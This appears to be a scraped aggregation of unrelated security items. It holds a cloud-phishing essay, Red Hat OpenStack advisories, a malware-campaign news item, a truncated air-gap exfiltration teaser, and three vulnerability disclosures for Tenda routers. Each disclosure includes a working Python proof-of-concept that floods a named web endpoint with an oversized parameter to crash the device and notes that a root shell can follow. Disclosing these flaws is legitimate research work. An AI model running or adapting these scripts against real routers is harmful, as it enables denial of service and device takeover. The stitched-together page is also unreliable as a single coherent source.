Phishing has long been one of the best ways to gain access to a target organization. It didn't used to be this way. In the early days of computer security, the remote code exploit (RCE) was the preferred method of gaining access, as it required no user interaction. In fact, if something required user interaction, it wasn't considered a serious threat. Better security practices started to take hold, and the RCE method of access became much more challenging. And it turned out, getting users to interact was easier than ever imagined.

The same cycle has started to repeat itself with on-premises targets. Organizations have started to make advances in securing their internal networks against using endpoint detection and response (EDR), and other technologies are better equipped to detect malware and lateral movement. While attacks are becoming more difficult, it's by no means an ineffective strategy for an attacker yet. Deploying ransomware and other forms of malware is still a common outcome.

**Why Your Cloud Infrastructure Is a Top Target for Phishing Attacks**

The cloud has given phishers a whole new frontier to attack, and it turns out it can be very dangerous. SaaS environments are ripe targets for phishing attacks and can give the attacker a lot more than access to some emails. Security tools are still maturing in this environment, which offers attackers a window of opportunity where methods such as phishing attacks can be very effective.

**Phishing Attacks Targeting Developers and Software Supply Chain**

As we saw recently, Dropbox had an incident due to a phishing attack against its developers. They were tricked into giving their Github credentials to an attacker by a phishing email and fake website, despite multifactor authentication (MFA). What makes this scary is that this wasn't just a random user from sales or another business function, it was developers with access to a lot of Dropbox data. Thankfully, the scope of the incident doesn't appear to affect Dropbox's most critical data.

GitHub, and other platforms in the continuous integration/continuous deployment (CI/CD) space, are the new "crown jewels" for many companies. With the right access, attackers can steal intellectual property, leak source code and other data, or conduct supply chain attacks. It goes even farther, as GitHub often integrates with other platforms, which the attacker may be able to pivot. All of this can happen without ever touching the victim's on-prem network, or many of the other security tools that organizations have acquired, since it is all software-as-a-service (SaaS)-to-SaaS.

Security in this scenario can be a challenge. Every SaaS provider does it differently. A customer's visibility into what happens in these platforms is often limited. GitHub, for example, only gives access to its Audit Log API under its Enterprise plan. Getting visibility is only the first hurdle to overcome, the next would be to make useful detection content around it. SaaS providers can be quite different in what they do and the data that they provide. Contextual understanding of how they work will be required to make and maintain the detections. Your organization may have many such SaaS platforms in use.

**How Do You Mitigate Risks Associated With Phishing in the Cloud?**

Identity platforms, such as Okta, can help mitigate the risk, but not completely. Identifying unauthorized logins is certainly one of the best ways to discover phishing attacks and respond to them. This is easier said than done, as attackers have caught on to the common ways of detecting their presence. Proxy servers or VPNs are easily used to at least appear to come from the same general area as the user in order to defeat country or impossible travel detections. More advanced machine learning models can be applied, but these are not yet widely adopted or proven.

Traditional threat detection is starting to adapt to the SaaS world as well. Falco, a popular threat detection tool for containers and cloud, has a plug-in system that can support nearly any platform. The Falco team has already released plug-ins and rules for Okta and GitHub, among others. For example, the GitHub plug-in has a rule that triggers if any commits show signs of a crypto miner. Levering these purpose-built detections is a good way to get started in bringing these platforms into your overall threat detection program.

**Phishing Is Here to Stay**

Phishing, and social engineering in general, will never be left behind. It has been an effective attack method for years, and will be for as long as people communicate. It is critical to understand that these attacks are not limited to the infrastructure you own or manage directly. SaaS is especially at risk due to the lack of visibility most organizations have to what actually happens on those platforms. Their security cannot be written off as someone else's problem, as a simple email and fake website is all it takes to get access to those resources.

Phishing in the Cloud: We're Gonna Need a Bigger Boat

Red Hat Security Advisory 2022-8847-01 - An update for protobuf is now available for Red Hat OpenStack Platform 16.2.4 (Train).

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.2.4 (protobuf) security update  
Advisory ID:       RHSA-2022:8847-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8847  
Issue date:        2022-12-07  
CVE Names:         CVE-2021-22570   
=====================================================================

1. Summary:

An update for protobuf is now available for Red Hat OpenStack Platform  
16.2.4 (Train).  
Red Hat Product Security has rated this update as having a security impact  
of Moderate.  
A Common Vulnerability Scoring System (CVSS) base score, which gives a  
detailed severity rating,  
is available for each vulnerability from the CVE link(s) in the References  
section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - noarch

3. Description:

Protocol Buffers are a way of encoding structured data in an efficient  
yet extensible format. Google uses Protocol Buffers for almost all of  
its internal RPC protocols and file formats.

Protocol buffers are a flexible, efficient, automated mechanism for  
serializing structured data – think XML, but smaller, faster, and  
simpler. You define how you want your data to be structured once, then  
you can use special generated source code to easily write and read  
your structured data to and from a variety of data streams and using a  
variety of languages. You can even update your data structure without  
breaking deployed programs that are compiled against the old format. This  
package contains Protocol Buffers compiler for all programming  
languages and C++ headers and Static libraries for Protocol Buffers built  
with optimize_for = LITE_RUNTIME.

Security Fix(es):

* Incorrect parsing of nullchar in the proto symbol leads to Nullptr  
dereference (CVE-2021-22570)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:  
https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2049429 - CVE-2021-22570 protobuf: Incorrect parsing of nullchar in the proto symbol leads to Nullptr dereference

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
protobuf-3.6.1-6.el8ost.src.rpm

noarch:  
python3-protobuf-3.6.1-6.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
protobuf-3.6.1-6.el8ost.src.rpm

noarch:  
python3-protobuf-3.6.1-6.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2021-22570  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5FpWNzjgjWX9erEAQj74hAAn8C33fY+jEtfS5EsOVSEbyw1OPxyfEfz  
kvBFwTG+R+9rd/pvLUr6+pKsPyASiBiO3ddm9GY++IePXxjwMn7bvOe4H9QqgP23  
5DhDrdWW8Oqv+wrOV7BAs13nCIGZTSof3NJ17SjUk6Wxex/Ne71Y0GEDhzqv3hXR  
WuGJ8tMWBftny9EdnQgLh4O0TC5Y1FBcIXL+ftwaKPCrs3QF+GwXmKYsiq4h0KGi  
98jDfKpP7EMF1ZojBzhIjc60wQUIbLiJKLx8bcsG13bPvxGiRyxRYHueHCJoWhcN  
amNRVdj+xUWYPPolRw5i1pZmPjIlbjwaL299MGeK1SfJ51eQYYzlKHBLKk2OfnE6  
AsONiGJKWICU6tx7ZcrW3p4skgNvGVd6WKAANWv7KWOdQy3OQ3m9ivG0qCxp3EyA  
nTjiWoX1+crMAcvtnqZ/Z9op9TLqL0eyhcgCpOIMZKFVy9NoKMmR7qpsx5lBBVTr  
82paMUhkzqNrHREeswMhxq3Q0zD3fZrjCR1Pl/+rYKVfjkX0ht2KFBjDEGUqH+uG  
N+z5H9kL3lP9W/lCwiIMbgUnvoqmrLFBqq5uXJSle6vmPF5ZthoQaUEsQUtqxKVM  
i7jmBmPOoOGYu1iLlu47fYUSgRMI+JjeXDz8bOOg42FJSYMcvfuzNGkEcTX0A9Me  
+GEDO6GfPBQ=  
=DSkQ  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8847-01

Red Hat Security Advisory 2022-8863-01 - Paramiko is a module for python 2.3 or greater that implements the SSH2 protocol for secure connections to remote machines. Unlike SSL, the SSH2 protocol does not require heirarchical certificates signed by a powerful central authority. You may know SSH2 as the protocol that replaced telnet and rsh for secure access to remote shells, but the protocol also includes the ability to open arbitrary channels to remote services across an encrypted tunnel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.1.9 (python-paramiko) security update  
Advisory ID:       RHSA-2022:8863-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8863  
Issue date:        2022-12-07  
CVE Names:         CVE-2022-24302  
====================================================================  
1. Summary:

An update for python-paramiko is now available for Red Hat OpenStack  
Platform 16.1.9 (Train).

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - noarch

3. Description:

Paramiko (a combination of the esperanto words for paranoid and friend) is  
a module for python 2.3 or greater that implements the SSH2 protocol for  
secure (encrypted and authenticated) connections to remote machines. Unlike  
SSL (aka TLS), the SSH2 protocol does not require heirarchical certificates  
signed by a powerful central authority. You may know SSH2 as the protocol  
that replaced telnet and rsh for secure access to remote shells, but the  
protocol also includes the ability to open arbitrary channels to remote  
services across an encrypted tunnel. (This is how sftp works, for example.)

Security Fix(es):

* Race condition in the write_private_key_file function (CVE-2022-24302)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2065665 - CVE-2022-24302 python-paramiko: Race condition in the write_private_key_file function

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
python-paramiko-2.4.2-8.el8ost.src.rpm

noarch:  
python3-paramiko-2.4.2-8.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
python-paramiko-2.4.2-8.el8ost.src.rpm

noarch:  
python3-paramiko-2.4.2-8.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-24302  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5FpftzjgjWX9erEAQiHhQ//XuOXXXKgCySGggwaggpRjXDncNeCSxhC  
TtNm9CWPtR/KRupNDCJ4Mr4Z8RU4sUgiimCno2k6tzGmKSeQF8uVC7QaKsT6dLD0  
2uk+IhpgTJp+FnOfWfxiHCr5lN5Qus1sQ7XSYyONBomJdJI3y3+92N/wKaw0/dxk  
6HtYbYADTxOfXt6M4iA6QZmOIW4v6odsAMbjxELgRK5L3le6qWu3l6qQHBVfJ2LA  
VpsCI/RgvSD8+VGBU+dEUIDRGAT+sFiF2lr4eeJuzGAyf9u1FQX8tcd0pfpmzFE8  
SvpgqRh1avsZKqRQz3J+7IOXUldi4ZM9SSghbDBpt3MsaoLEPTTEW5MPpblYJiIV  
B8cJrUZQTWv20NVlyVCQCNaNXsYK7OxuQF1w4xB7ao2Pry7uTxEXnsbaxieBU14O  
En9a+TFlLOzZISVZBB9c2YKL/qVGe56vNxPwIXALNc924A+jGLPzJVvtri9Ca8n3  
U9fQbQsqzMp+LynRE7vz7Vkq8AXLP8by3tBxKCODogdXuG2SIi3Ppc4cmxo1QUM5  
J/qOd3auCobwdDoztVFd8D7lKp6r4dO8R98J0pfJp9yJWCe64OVRh1WEPNIEB/dd  
cscu/dRYUhUruegGapUDRkOFz5W3xNw23sX9FFnkDaz4a7B3RV6k5bNXDi5+pyWK  
a0neN/dtaIE4L  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8863-01

Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims.
The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News.
"This campaign resulted in thousands of victims," the Dutch cybersecurity company said,

Mobile Security / Android Malware

Researchers have shed light on a new hybrid malware campaign targeting both Android and Windows operating systems in a bid to expand its pool of victims.

The attacks entail the use of different malware such as ERMAC, Erbium, Aurora, and Laplas, according to a ThreatFabric report shared with The Hacker News.

"This campaign resulted in thousands of victims," the Dutch cybersecurity company said, adding, "Erbium stealer successfully exfiltrated data from more then 1,300 victims."

The ERMAC infections commence with a fraudulent website that claims to offer Wi-Fi authorization software for Android and Windows that, when installed, comes with features to steal seed phrases from crypto wallets and other sensitive data.

ThreatFabric said it also found a number of malicious apps that were trojanized versions of legitimate apps like Instagram, with the operators using them as droppers to deliver the obfuscated malicious payload.

The rogue apps, dubbed Zombinder, are said to have been developed using an APK binding service advertised on the dark web by a well-known threat actor since March 2022.

Such zombie apps have been used to distribute Android banking trojans like SOVA and Xenomorph targeting customers in Spain, Portugal, and Canada, among others.

Interestingly, the download option for Windows on the booby-trapped website distributing ERMAC is designed to deploy the Erbium and Aurora information stealers on the compromised system.

Erbium, which is a malware-as-a-service (MaaS) licensed for $1,000 per year, not only steals passwords and credit card information, but has also been observed acting as a conduit to drop the Laplas clipper that's used to hijack crypto transactions.

"The presence of such a wide variety of trojans might also indicate that the malicious landing page is used by multiple actors and provided to them as a part of a third-party distribution service," the researchers theorized.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Uncover Darknet Service Allowing Hackers to Trojonize Legit Android Apps

Red Hat Security Advisory 2022-8870-01 - An update for openstack-neutron is now available for Red Hat OpenStack Platform 16.1.9 (Train) for Red Hat Enterprise Linux (RHEL) 8.2.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.1.9 (openstack-neutron) security update  
Advisory ID:       RHSA-2022:8870-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8870  
Issue date:        2022-12-07  
CVE Names:         CVE-2022-3277  
====================================================================  
1. Summary:

An update for openstack-neutron is now available for Red Hat OpenStack  
Platform 16.1.9 (Train) for Red Hat Enterprise Linux (RHEL) 8.2.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - noarch

3. Description:

OpenStack Networking (neutron) is a virtual network service for OpenStack.  
Just as OpenStack Compute (nova) provides an API to dynamically request and  
configure virtual servers, OpenStack Networking provides an API to  
dynamically request and configure virtual networks. These networks connect  
'interfaces' from other OpenStack services (e.g. virtual NICs from Compute  
VMs).  The OpenStack Networking API supports extensions to provide advanced  
network capabilities (e.g. QoS, ACLs, network monitoring, etc.)

Security Fix(es):

* unrestricted creation of security groups (CVE-2022-3277)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2015531 - Nova evacuate fails due to timeout waiting for a network-vif-plugged event for instance  
2023242 - MAC address validation passes on invalid MAC addresses (dropped hex digits) [osp-16.1]  
2024692 - [RFE][OVS] QoS policies implementation with HW offload when OVS metering is not offloaded (max BW, egress)  
2035302 - Concurrent bulk requests make neutron-server use 100% CPU on all the workers  
2041346 - [RHOSP 16.1] set the log priority to log.info in "ensure_device_is_ready" function in ip_lib.py  
2055294 - Allow RBAC on Neutron quotas  
2070629 - Since implementation of uplink_status_propagation, default behavior changed for VF link propagation from auto to disabled  
2077016 - [OSP16.1] HA L3 router/keepalived stability issues (ML2/OVS)  
2078266 - [RCA][OSP16.1] Neutron HA qrouter namespace disappeared and router in inconsistent state in DB  
2129193 - CVE-2022-3277 openstack-neutron: unrestricted creation of security groups  
2129712 - [PerfCI][OVS][16.1] create_and_list_networks scenario fails SLA since puddle  RHOS-16.1-RHEL-8-20220804.n.1

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
openstack-neutron-15.2.1-1.20221005123225.40d217c.el8ost.src.rpm

noarch:  
openstack-neutron-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-common-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-linuxbridge-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-macvtap-agent-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-metering-agent-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-ml2-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-openvswitch-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-rpc-server-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
openstack-neutron-sriov-nic-agent-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm  
python3-neutron-15.2.1-1.20221005123225.40d217c.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3277  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5FpjdzjgjWX9erEAQjl4A//RH87p4PcUa3+8Ssgyi5t7G4fA/a+8bEt  
9ku3jhhSLao7fsgPYX9Ab8v+OjmuX6yYPb3APV4GhG84mMvoqNgQZahFT1mprIIj  
re453zVNVhLCLhS8GMW/Ve4IPBFK6IByLi1SsPMFuQNP/1wCPyxeulbgDbQjrHP2  
dgniOR6dZ9e1jXAdv3wngGZreVfy9g9V6K2gy2SykV2cQ2H7b9VbkeSlymB399Bi  
hNoVRoippZiMerDMJ5Cy28qHqtr94tHC0vrATGgy/Y9QmlQDyxaSFT4PRGWZ9t/b  
07z8nqoqO5J+RMEG2D39RzgEoWkHrqPuN5XHPGtTV9/pZSTIuBz7cY48vNRXjtqL  
41jRA6zQSKsG+YTaWNVdjsTY3Qov+DFlH2E4VlkvUOJn6TK9/s8Ivpygbf2gXrpe  
qTNBNC4pBY32pIWuOxEfvEYlacmF75Jzd0WvvbAEp8FlaxzLkc/f738HMPZHjpEQ  
48XgizmDJ7mQblmaQj6F6Bhb3aR2yDwkuCZ8lsLSUO/wifXynZ9HSZGglyVbj47m  
GphysvBLy69AlTHCUAuqlITLn9Eaa/EyLk7F78nbInbzGY6f8zVklUfT5ykwJv08  
7O7OC63X5jL/Wbvhhe9DxX4/gU9zrGOAnfu22pRv6/CsBarcotUhkctUZLsMmgQV  
vCjurW8QquE=CZ0M  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8870-01

Tenda W30E V1.0.1.25(633) was discovered to contain a stack overflow via the Go parameter at /goform/SafeMacFilter.

Permalink

Cannot retrieve contributors at this time

**Tenda W30E V1.0.1.25(633) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2218.html
    

**Affected version**

**Vulnerability details**

In /goform/SafeMacFilter, when the menufacturer is tenda, Go will be copied to s by strcpy. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

cmd \= b'menufacturer=tenda&Go=' + b'a' \* 0x3000

url \= b"http://192.168.10.103/login/Auth"
payload \= b"http://192.168.10.103/goform/SafeMacFilter/?" + cmd

data \= {
    "username": "admin",
    "password": "admin",
}

def attack():
    s \= requests.session()
    resp \= s.post(url\=url, data\=data)
    print(resp.content)
    resp \= s.post(url\=payload, data\=data)
    print(resp.content)

attack()

You can see that the router crashed, and finally you can write an exp to get a root shell

CVE-2022-45519: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda W6-S v1.0.0.4(510) was discovered to contain a stack overflow via the wl_radio parameter at /goform/WifiMacFilterGet.

**Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-2627.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiMacFilterGet, when wl\_radio is 0, the index will be spliced into v6 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.

**Poc**

import requests

target\_url \= 'http://192.168.10.105/login/Auth'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 \= 'usertype=admin&password=&time=2022;7;6;14;9;6&username='

requests.post(target\_url, headers \= target\_headers, data \= p1, verify \= False, timeout \= 1)

target\_url \= 'http://192.168.10.105/goform/WifiMacFilterGet'

target\_headers \= {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '\*/\*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}

p2 \= 'wl\_radio=0&index=' + 'a' \* 0x3000
requests.post(target\_url, headers \= target\_headers, data \= p2, verify \= False, timeout \= 1)

After sending the poc, the router will crash, and finally we can write the exp to get the root shell

CVE-2022-45499: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Tenda A18 v15.13.07.09 was discovered to contain a stack overflow via the security_5g parameter at /goform/WifiBasicSet.

Permalink

Cannot retrieve contributors at this time

**Tenda A18 V15.13.07.09 Stack overflow vulnerability****Firmware information**

*   Manufacturer's address: https://www.tenda.com.cn/
    
*   Firmware download address: https://www.tenda.com.cn/download/detail-2760.html
    

**Affected version**

**Vulnerability details**

In /goform/WifiBasicSet, the user can control security\_5g, which will be copied to param\_5g by the strcpy function. It is worth noting that there is no size check, which leads to a stack overflow vulnerability

**Poc**

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80

r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)

r.connect((ip, port))

rn \= b'\\r\\n'

p1 \= b'a' \* 0x3000
p2 \= b'security\_5g=' + p1

p3 \= b"POST /goform/WifiBasicSet" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

You can see the router crash, and finally we can write an exp to get a root shell

CVE-2022-44931: IOT_Vul/readme.md at main · z1r00/IOT_Vul

Red Hat Security Advisory 2022-8855-01 - OpenStack Networking is a virtual network service for OpenStack. Just as OpenStack Compute provides an API to dynamically request and configure virtual servers, OpenStack Networking provides an API to dynamically request and configure virtual networks. These networks connect 'interfaces' from other OpenStack services. The OpenStack Networking API supports extensions to provide advanced network capabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: Red Hat OpenStack Platform 16.2.4 (openstack-neutron) security update  
Advisory ID:       RHSA-2022:8855-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8855  
Issue date:        2022-12-07  
CVE Names:         CVE-2022-3277  
====================================================================  
1. Summary:

An update for openstack-neutron is now available for Red Hat OpenStack  
Platform 16.2.4 (Train) for Red Hat Enterprise Linux (RHEL) 8.4.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.2 - noarch

3. Description:

OpenStack Networking (neutron) is a virtual network service for OpenStack.  
Just as OpenStack Compute (nova) provides an API to dynamically request and  
configure virtual servers, OpenStack Networking provides an API to  
dynamically request and configure virtual networks. These networks connect  
'interfaces' from other OpenStack services (e.g. virtual NICs from Compute  
VMs). The OpenStack Networking API supports extensions to provide advanced  
network capabilities (e.g. QoS, ACLs, network monitoring, etc.)

Security Fix(es):

* unrestricted creation of security groups (CVE-2022-3277)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2097444 - OVS minimum bandwidth is not cleaned when network policy is removed from port  
2102147 - [RHOSP16.2.1] Incorrect port count in horizon overview page  
2107602 - neutron revision_number does not bump on network update  
2129193 - CVE-2022-3277 openstack-neutron: unrestricted creation of security groups  
2135922 - Nova evacuate fails due to timeout waiting for a network-vif-plugged event for instance

6. Package List:

Red Hat OpenStack Platform 16.2:

Source:  
openstack-neutron-15.3.5-2.20221005184727.c81fb5b.el8ost.src.rpm

noarch:  
openstack-neutron-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-common-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-linuxbridge-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-macvtap-agent-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-metering-agent-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-ml2-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-openvswitch-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-rpc-server-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
openstack-neutron-sriov-nic-agent-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm  
python3-neutron-15.3.5-2.20221005184727.c81fb5b.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3277  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY5FpedzjgjWX9erEAQixsQ//cexa5tqkrcCgUH/1SAac7uLHuHfSF5td  
Hs4yJsc/NjRtvJadvBLA66BXgLmMQodN491hbE8Q+Mh6pzIYaf6HziisScLn1FjU  
dnJQFO0CXjV5p6v7DV6ewkGq0P7ZOctUhOeqV3hJxbUCqcSQzXMQmR2jswM1kfJI  
AMmo6FBDE8JHW7AyIDtnyfbQ0/LVT5y/wufvWUd2FTRLLslD7naSinRUaSfGNTAl  
woyxY52kGdEATJVSoNgAHLDOwao2L60Dxvx7c9nkKQ3nRzzzo9o30lJRW6ds91cv  
zzwwRQ16HDCgWaLJLPL6JEDM4kMpASjevjYA9u8SqK82I4hgpXA0udgtAMxmPI9j  
iKW1jSbiLMIM/wnqejw1bgKPCx+GUcVYgEiKxbBnVsxTMC2ZCa0P86C5XDEV1rmC  
GJHsClPbM5MLXueRE1dbJKWBgsmZFoMpcfztKpucoyVN+2/FFxMp95oA/AoYPTBn  
1xUzMTfV3VPS+NiWESp4S+q6Fyxf02cJUqX1WLAkzDDqUr+XfDRUIdxY1RfjCJ+e  
DKnqonSascxxhr+p4siuEApLq0DaLW0Nt/oXZZK9vKYPe5xM+ybegKybXineNgJu  
GbeUh/CLUQNDwd+9F1mjxhsIlqYbkCmwHhnjwpspudE2NWJPnbEH43qlyzCj07g9  
ROQNtYlFJgM=1W9J  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8855-01

An unconventional data exfiltration method leverages a previously undocumented covert channel to leak sensitive information from air-gapped systems.
"The information emanates from the air-gapped computer over the air to a distance of 2 m and more and can be picked up by a nearby insider or spy with a mobile phone or laptop," Dr. Mordechai Guri, the head of R&D in the Cyber Security Research

Data Protection / Computer Security

